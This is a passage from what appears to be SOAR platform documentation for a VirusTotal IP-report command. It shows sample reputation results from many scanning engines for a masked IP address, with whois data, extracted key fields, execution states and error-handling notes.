"undetected": 8,
"timeout": 0
},
"asn": 9009,
"whois_date": 1619276931,
"last_analysis_results": {
"CMC Threat Intelligence": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CMC Threat Intelligence"
},
"DNS8": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "DNS8"
},
"Lionic": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Lionic"
},
"Snort IP sample list": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Snort IP sample list"
},
"AICC (MONITORAPP)": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AICC (MONITORAPP)"
},
"benkow.cc": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "benkow.cc"
},
"VX Vault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "VX Vault"
},
"securolytics": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "securolytics"
},
"MalwarePatrol": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwarePatrol"
},
"Armis": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Armis"
},
"MalBeacon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalBeacon"
},
"Comodo Valkyrie Verdict": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Comodo Valkyrie Verdict"
},
"PhishLabs": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "PhishLabs"
},
"EmergingThreats": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EmergingThreats"
},
"zvelo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "zvelo"
},
"K7AntiVirus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "K7AntiVirus"
},
"Nucleon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Nucleon"
},
"Virusdie External Site Scan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Virusdie External Site Scan"
},
"CINS Army": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CINS Army"
},
"Spamhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spamhaus"
},
"Quttera": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quttera"
},
"Yandex Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Yandex Safebrowsing"
},
"SafeToOpen": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "SafeToOpen"
},
"MalwareDomainList": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwareDomainList"
},
"CyberCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyberCrime"
},
"Lumu": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Lumu"
},
"Google Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Google Safebrowsing"
},
"FraudScore": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "FraudScore"
},
"Kaspersky": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Kaspersky"
},
"BitDefender": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BitDefender"
},
"Emsisoft": {
"category": "malicious",
"result": "phishing",
"method": "blacklist",
"engine_name": "Emsisoft"
},
"GreenSnow": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "GreenSnow"
},
"G-Data": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "G-Data"
},
"Segasec": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Segasec"
},
"OpenPhish": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "OpenPhish"
},
"Sucuri SiteCheck": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sucuri SiteCheck"
},
"AutoShun": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "AutoShun"
},
"Trustwave": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Trustwave"
},
"Web Security Guard": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Web Security Guard"
},
"CyRadar": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "CyRadar"
},
"desenmascara.me": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "desenmascara.me"
},
"ADMINUSLabs": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ADMINUSLabs"
},
"Scantitan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Scantitan"
},
"IPsum": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "IPsum"
},
"Dr.Web": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Dr.Web"
},
"AlienVault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AlienVault"
},
"Sophos": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sophos"
},
"malwares.com URL checker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "malwares.com URL checker"
},
"Abusix": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Abusix"
},
"Phishtank": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishtank"
},
"EonScope": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EonScope"
},
"Malwared": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Malwared"
},
"Avira": {
"category": "malicious",
"result": "phishing",
"method": "blacklist",
"engine_name": "Avira"
},
"NotMining": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "NotMining"
},
"Cyan": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Cyan"
},
"Antiy-AVL": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Antiy-AVL"
},
"SCUMWARE.org": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SCUMWARE.org"
},
"Spam404": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spam404"
},
"MalSilo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalSilo"
},
"ESTsecurity-Threat Inside": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESTsecurity-Threat Inside"
},
"Certego": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Certego"
},
"ESET": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESET"
},
"Threatsourcing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Threatsourcing"
},
"URLhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "URLhaus"
},
"SecureBrain": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SecureBrain"
},
"Webroot": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "Webroot"
},
"PREBYTES": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "PREBYTES"
},
"StopForumSpam": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "StopForumSpam"
},
"Blueliv": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Blueliv"
},
"Hoplite Industries": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Hoplite Industries"
},
"Netcraft": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "Netcraft"
},
"CRDF": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "CRDF"
},
"ThreatHive": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ThreatHive"
},
"BADWARE.INFO": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BADWARE.INFO"
},
"Forcepoint ThreatSeeker": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Forcepoint ThreatSeeker"
},
"Quick Heal": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quick Heal"
},
"Tencent": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Tencent"
},
"StopBadware": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "StopBadware"
},
"Fortinet": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Fortinet"
},
"Bfore.Ai PreCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Bfore.Ai PreCrime"
},
"ZeroCERT": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ZeroCERT"
},
"Baidu-International": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Baidu-International"
},
"Phishing Database": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishing Database"
},
"alphaMountain.ai": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "alphaMountain.ai"
}
},
"reputation": 0,
"last_modification_date": 1624460268,
"total_votes": {
"harmless": 0,
"malicious": 0
},
"continent": "EU",
"whois": "NetRange: ***.***.***.*** - ***.***.***.***\nCIDR: ***.***.***.***\nNetName: RIPE-37\nNetHandle: NET-37-0-0-0-1\nParent: ()\nNetType: Allocated to RIPE NCC\nOriginAS: \nOrganization: RIPE Network Coordination Centre (RIPE)\nRegDate: 2010-11-30\nUpdated: 2011-01-17\nComment: These addresses have been further assigned to users in\nComment: the RIPE NCC region. Contact information can be found in\nComment: the RIPE database at http://www.ripe.net/whois\nRef: https://rdap.arin.net/registry/ip/***.***.***.***\nResourceLink: https://apps.db.ripe.net/search/query.html\nResourceLink: whois.ripe.net\nOrgName: RIPE Network Coordination Centre\nOrgId: RIPE\nAddress: P.O. Box 10096\nCity: Amsterdam\nStateProv: \nPostalCode: 1001EB\nCountry: NL\nRegDate: \nUpdated: 2013-07-29\nRef: https://rdap.arin.net/registry/entity/RIPE\nReferralServer: whois://whois.ripe.net\nResourceLink: https://apps.db.ripe.net/search/query.html\nOrgAbuseHandle: ABUSE3850-ARIN\nOrgAbuseName: Abuse Contact\nOrgAbusePhone: +31205354444 \nOrgAbuseEmail: abuse@ripe.net\nOrgAbuseRef: https://rdap.arin.net/registry/entity/ABUSE3850-ARIN\nOrgTechHandle: RNO29-ARIN\nOrgTechName: RIPE NCC Operations\nOrgTechPhone: +31 20 535 4444 \nOrgTechEmail: hostmaster@ripe.net\nOrgTechRef: https://rdap.arin.net/registry/entity/RNO29-ARIN\ninetnum: ***.***.***.*** - ***.***.***.***\nnetname: M247-LTD-Frankfurt\ndescr: M247 LTD Frankfurt Infrastructure\ncountry: DE\ngeoloc: 50.0658 8.6165\nadmin-c: GBXS1-RIPE\ntech-c: GBXS1-RIPE\nstatus: ASSIGNED PA\nmnt-by: SDAT-MNT\nmnt-routes: GLOBALAXS-MNT\nmnt-domains: GLOBALAXS-MNT\nremarks: --------------LEGAL CONCERNS-----------------------------\nremarks: For any legal requests, please send an email\nremarks: to *****@*****.*** for a maximum 48hours response.\nremarks: ---------------------------------------------------------\ncreated: 2019-07-16T12:54:17Z\nlast-modified: 2019-07-16T12:54:17Z\nsource: RIPE\nrole: GLOBALAXS DE NOC\naddress: Hanauer Landstra?e 302, Hessen\naddress: 60314, Frankfurt, Germany\nabuse-mailbox: abuse@m247.ro\nnic-hdl: GBXS1-RIPE\nmnt-by: GLOBALAXS-MNT\ncreated: 2016-03-10T13:28:16Z\nlast-modified: 2018-07-20T12:25:46Z\nsource: RIPE # Filtered\nroute: ***.***.***.***/**\norigin: AS9009\nmnt-by: GLOBALAXS-MNT\ncreated: 2019-07-17T08:24:38Z\nlast-modified: 2019-07-17T08:24:38Z\nsource: RIPE\n"
},
"type": "ip_address",
"id": "***.***.***.***",
"links": {
"self": "https://www.virustotal.com/api/v3/ip_addresses/***.***.***.***"
}
}
}
]Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.
SAMPLE DATA
{
"IPs": [
"***.***.***.***"
],
"Countries": [
"DE"
],
"ASOwners": [
"M247 Ltd"
],
"HarmlessCounts": [
71
],
"MaliciousCounts": [
6
],
"SuspiciousCounts": [
0
],
"UndetectedCounts": [
8
],
"Reputations": [
0
],
"HarmlessVoteCounts": [
0
],
"MaliciousVoteCounts": [
0
],
"Whois": "[\"\r\nNetRange: ***.***.***.*** - ***.***.***.***\\n\r\nCIDR: ***.***.***.***\\nNetName: RIPE-37\\n\r\nNetHandle: NET-37-0-0-0-1\\n\r\nParent: ()\\n\r\nNetType: Allocated to RIPE NCC\\n\r\nOriginAS: \\n\r\nOrganization: RIPE Network Coordination Centre (RIPE)\\n\r\nRegDate: 2010-11-30\\n\r\nUpdated: 2011-01-17\\n\r\nComment: These addresses have been further assigned to users in\\n\r\nComment: the RIPE NCC region. Contact information can be found in\\n\r\nComment: the RIPE database at http://www.ripe.net/whois\\nRef: https://rdap.arin.net/registry/ip/***.***.***.***\\nResourceLink: https://apps.db.ripe.net/search/query.html\\n\r\nResourceLink: whois.ripe.net\\n\r\nOrgName: RIPE Network Coordination Centre\\n\r\nOrgId: RIPE\\nAddress: P.O. Box 10096\\n\r\nCity: Amsterdam\\nStateProv: \\nPostalCode: 1001EB\\n\r\nCountry: NL\\nRegDate: \\n\r\nUpdated: 2013-07-29\\n\r\nRef: https://rdap.arin.net/registry/entity/RIPE\\n\r\nReferralServer: whois://whois.ripe.net\\n\r\nResourceLink: https://apps.db.ripe.net/search/query.html\\nOrgAbuseHandle: ABUSE3850-ARIN\\n\r\nOrgAbuseName: Abuse Contact\\nOrgAbusePhone: +31205354444 \\n\r\nOrgAbuseEmail: abuse@ripe.net\\n\r\nOrgAbuseRef: https://rdap.arin.net/registry/entity/ABUSE3850-ARIN\\nOrgTechHandle: RNO29-ARIN\\nOrgTechName: RIPE NCC Operations\\n\r\nOrgTechPhone: +31 20 535 4444 \\n\r\nOrgTechEmail: hostmaster@ripe.net\\nOrgTechRef: https://rdap.arin.net/registry/entity/RNO29-ARIN\\ninetnum: ***.***.***.*** - ***.***.***.***\\nnetname: M247-LTD-Frankfurt\\n\r\ndescr: M247 LTD Frankfurt Infrastructure\\n\r\ncountry: DE\\n\r\ngeoloc: 50.0658 8.6165\\n\r\nadmin-c: GBXS1-RIPE\\n\r\ntech-c: GBXS1-RIPE\\n\r\nstatus: ASSIGNED PA\\n\r\nmnt-by: SDAT-MNT\\nmnt-routes: GLOBALAXS-MNT\\n\r\nmnt-domains: GLOBALAXS-MNT\\nremarks: --------------LEGAL CONCERNS-----------------------------\\n\r\nremarks: For any legal requests, please send an email\\nremarks: to *****@*****.*** for a maximum 48hours response.\\n\r\nremarks: ---------------------------------------------------------\\n\r\ncreated: 2019-07-16T12:54:17Z\\n\r\nlast-modified: 2019-07-16T12:54:17Z\\nsource: RIPE\\n\r\nrole: GLOBALAXS DE NOC\\n\r\naddress: Hanauer Landstrae 302, Hessen\\n\r\naddress: 60314, Frankfurt, Germany\\n\r\nabuse-mailbox: abuse@m247.ro\\n\r\nnic-hdl: GBXS1-RIPE\\nmnt-by: GLOBALAXS-MNT\\n\r\ncreated: 2016-03-10T13:28:16Z\\n\r\nlast-modified: 2018-07-20T12:25:46Z\\n\r\nsource: RIPE # Filtered\\nroute: ***.***.***.***/**\\n\r\norigin: AS9009\\nmnt-by: GLOBALAXS-MNT\\n\r\ncreated: 2019-07-17T08:24:38Z\\n\r\nlast-modified: 2019-07-17T08:24:38Z\\n\r\nsource: RIPE\\n\r\n\"]"
}Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.
The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.
The Failed state can be triggered by any of the following errors:
A connection issue with the integration
The API returned an error message
No response from the API
You can view more details about an error in the Error tab.
Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.
SAMPLE DATA
SuccessfulProvides a brief summary of outputs in an HTML formatted table.
SAMPLE DATA
DATA |
|---|
{'attributes': {'regional_internet_registry': 'RIPE NCC', 'network': '***.***.***.***/**', 'tags': [], 'country': 'DE', 'as_owner': 'M247 Ltd', 'last_analysis_stats': {'harmless': 71, 'malicious': 6, 'suspicious': 0, 'undetected': 8, 'timeout': 0}, 'asn': 9009, 'whois_date': 1619276931, 'last_analysis_results': {'CMC Threat Intelligence': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CMC Threat Intelligence'}, 'DNS8': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'DNS8'}, 'Lionic': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Lionic'}, 'Snort IP sample list': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Snort IP sample list'}, 'AICC (MONITORAPP)': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'AICC (MONITORAPP)'}, 'http://benkow.cc ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://benkow.cc '}, 'VX Vault': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'VX Vault'}, 'securolytics': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'securolytics'}, 'MalwarePatrol': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalwarePatrol'}, 'Armis': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Armis'}, 'MalBeacon': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalBeacon'}, 'Comodo Valkyrie Verdict': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Comodo Valkyrie Verdict'}, 'PhishLabs': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'PhishLabs'}, 'EmergingThreats': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'EmergingThreats'}, 'zvelo': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'zvelo'}, 'K7AntiVirus': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'K7AntiVirus'}, 'Nucleon': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Nucleon'}, 'Virusdie External Site Scan': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Virusdie External Site Scan'}, 'CINS Army': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CINS Army'}, 'Spamhaus': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Spamhaus'}, 'Quttera': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Quttera'}, 'Yandex Safebrowsing': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Yandex Safebrowsing'}, 'SafeToOpen': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'SafeToOpen'}, 'MalwareDomainList': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalwareDomainList'}, 'CyberCrime': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CyberCrime'}, 'Lumu': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'Lumu'}, 'Google Safebrowsing': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Google Safebrowsing'}, 'FraudScore': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'FraudScore'}, 'Kaspersky': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'Kaspersky'}, 'BitDefender': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'BitDefender'}, 'Emsisoft': {'category': 'malicious', 'result': 'phishing', 'method': 'blacklist', 'engine_name': 'Emsisoft'}, 'GreenSnow': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'GreenSnow'}, 'G-Data': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'G-Data'}, 'Segasec': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Segasec'}, 'OpenPhish': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'OpenPhish'}, 'Sucuri SiteCheck': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Sucuri SiteCheck'}, 'AutoShun': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'AutoShun'}, 'Trustwave': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Trustwave'}, 'Web Security Guard': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Web Security Guard'}, 'CyRadar': {'category': 'malicious', 'result': 'malicious', 'method': 'blacklist', 'engine_name': 'CyRadar'}, 'http://desenmascara.me ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://desenmascara.me '}, 'ADMINUSLabs': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ADMINUSLabs'}, 'Scantitan': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Scantitan'}, 'IPsum': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'IPsum'}, 'Dr.Web': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Dr.Web'}, 'AlienVault': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'AlienVault'}, 'Sophos': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Sophos'}, 'http://malwares.com URL checker': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://malwares.com URL checker'}, 'Abusix': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Abusix'}, 'Phishtank': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Phishtank'}, 'EonScope': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'EonScope'}, 'Malwared': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Malwared'}, 'Avira': {'category': 'malicious', 'result': 'phishing', 'method': 'blacklist', 'engine_name': 'Avira'}, 'NotMining': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'NotMining'}, 'Cyan': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'Cyan'}, 'Antiy-AVL': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Antiy-AVL'}, 'http://SCUMWARE.org ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://SCUMWARE.org '}, 'Spam404': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Spam404'}, 'MalSilo': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalSilo'}, 'ESTsecurity-Threat Inside': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ESTsecurity-Threat Inside'}, 'Certego': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Certego'}, 'ESET': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ESET'}, 'Threatsourcing': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Threatsourcing'}, 'URLhaus': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'URLhaus'}, 'SecureBrain': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'SecureBrain'}, 'Webroot': {'category': 'malicious', 'result': 'malicious', 'method': 'blacklist', 'engine_name': 'Webroot'}, 'PREBYTES': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'PREBYTES'}, 'StopForumSpam': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'StopForumSpam'}, 'Blueliv': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Blueliv'}, 'Hoplite Industries': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Hoplite Industries'}, 'Netcraft': {'category': 'malicious', 'result': 'malicious', 'method': 'blacklist', 'engine_name': 'Netcraft'}, 'CRDF': {'category': 'malicious', 'result': 'malicious', 'method': 'blacklist', 'engine_name': 'CRDF'}, 'ThreatHive': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ThreatHive'}, 'http://BADWARE.INFO ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://BADWARE.INFO '}, 'Forcepoint ThreatSeeker': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'Forcepoint ThreatSeeker'}, 'Quick Heal': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Quick Heal'}, 'Tencent': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Tencent'}, 'StopBadware': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'StopBadware'}, 'Fortinet': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Fortinet'}, 'http://Bfore.Ai PreCrime': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://Bfore.Ai PreCrime'}, 'ZeroCERT': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ZeroCERT'}, 'Baidu-International': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Baidu-International'}, 'Phishing Database': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Phishing Database'}, 'http://alphaMountain.ai ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://alphaMountain.ai '}}, 'reputation': 0, 'last_modification_date': 1624460268, 'total_votes': {'harmless': 0, 'malicious': 0}, 'continent': 'EU', 'whois': 'NetRange: ***.***.***.*** - ***.***.***.***\nCIDR: ***.***.***.***\nNetName: RIPE-37\nNetHandle: NET-37-0-0-0-1\nParent: ()\nNetType: Allocated to RIPE NCC\nOriginAS: \nOrganization: RIPE Network Coordination Centre (RIPE)\nRegDate: 2010-11-30\nUpdated: 2011-01-17\nComment: These addresses have been further assigned to users in\nComment: the RIPE NCC region. Contact information can be found in\nComment: the RIPE database at http://www.ripe.net/whois\nRef: https://rdap.arin.net/registry/ip/***.***.***.***\nResourceLink: https://apps.db.ripe.net/search/query.html\nResourceLink: whois.ripe.net\nOrgName: RIPE Network Coordination Centre\nOrgId: RIPE\nAddress: P.O. Box 10096\nCity: Amsterdam\nStateProv: \nPostalCode: 1001EB\nCountry: NL\nRegDate: \nUpdated: 2013-07-29\nRef: https://rdap.arin.net/registry/entity/RIPE\nReferralServer: whois://whois.ripe.net\nResourceLink: https://apps.db.ripe.net/search/query.html\nOrgAbuseHandle: ABUSE3850-ARIN\nOrgAbuseName: Abuse Contact\nOrgAbusePhone: +31205354444 \nOrgAbuseEmail: abuse@ripe.net\nOrgAbuseRef: https://rdap.arin.net/registry/entity/ABUSE3850-ARIN\nOrgTechHandle: RNO29-ARIN\nOrgTechName: RIPE NCC Operations\nOrgTechPhone: +31 20 535 4444 \nOrgTechEmail: hostmaster@ripe.net\nOrgTechRef: https://rdap.arin.net/registry/entity/RNO29-ARIN\ninetnum: ***.***.***.*** - ***.***.***.***\nnetname: M247-LTD-Frankfurt\ndescr: M247 LTD Frankfurt Infrastructure\ncountry: DE\ngeoloc: 50.0658 8.6165\nadmin-c: GBXS1-RIPE\ntech-c: GBXS1-RIPE\nstatus: ASSIGNED PA\nmnt-by: SDAT-MNT\nmnt-routes: GLOBALAXS-MNT\nmnt-domains: GLOBALAXS-MNT\nremarks: --------------LEGAL CONCERNS-----------------------------\nremarks: For any legal requests, please send an email\nremarks: to *****@*****.*** for a maximum 48hours response.\nremarks: ---------------------------------------------------------\ncreated: 2019-07-16T12:54:17Z\nlast-modified: 2019-07-16T12:54:17Z\nsource: RIPE\nrole: GLOBALAXS DE NOC\naddress: Hanauer Landstra?e 302, Hessen\naddress: 60314, Frankfurt, Germany\nabuse-mailbox: abuse@m247.ro\nnic-hdl: GBXS1-RIPE\nmnt-by: GLOBALAXS-MNT\ncreated: 2016-03-10T13:28:16Z\nlast-modified: 2018-07-20T12:25:46Z\nsource: RIPE # Filtered\nroute: ***.***.***.***/**\norigin: AS9009\nmnt-by: GLOBALAXS-MNT\ncreated: 2019-07-17T08:24:38Z\nlast-modified: 2019-07-17T08:24:38Z\nsource: RIPE\n'}, 'type': 'ip_address', 'id': '***.***.***.***', 'links': {'self': 'https://www.virustotal.com/api/v3/ip_addresses/***.***.***.***'}} |
Error Handling
If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.
The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.
Parts in Error | Description | Example |
Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Get IP Reports failed. |
